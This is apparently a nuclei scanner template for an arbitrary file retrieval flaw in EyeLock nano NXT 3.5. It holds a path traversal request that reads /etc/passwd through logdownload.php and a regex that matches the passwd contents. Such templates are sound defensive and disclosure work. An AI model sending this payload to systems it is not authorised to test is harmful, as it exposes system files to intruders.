nuclei-templates/http/vulnerabilities/other/eyelock-nano-lfd.yaml

31 lines
1.0 KiB
YAML
Raw Normal View History

2021-08-16 10:42:45 +00:00
id: eyelock-nano-lfd
info:
name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
2021-08-16 10:42:45 +00:00
author: geeknik
severity: high
2023-10-14 11:27:55 +00:00
description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
reference:
- https://www.zeroscience.mk/codes/eyelock_lfd.txt
metadata:
max-request: 1
2023-10-14 11:27:55 +00:00
tags: iot,lfi,eyelock
2021-08-16 10:42:45 +00:00
http:
2021-08-16 10:42:45 +00:00
- method: GET
path:
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
2023-10-14 11:27:55 +00:00
2021-08-16 10:42:45 +00:00
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
# digest: 4a0a00473045022032e52a55ea074d1260dcdd3cd9cca43408e1a518dfec633df2d5865351fd27a40221009f4d1d65699d6288cd8a54a263927849b4e093b88e3d61bb69fb0da42495cbc6:922c64590222798bb761d5b6d8e72950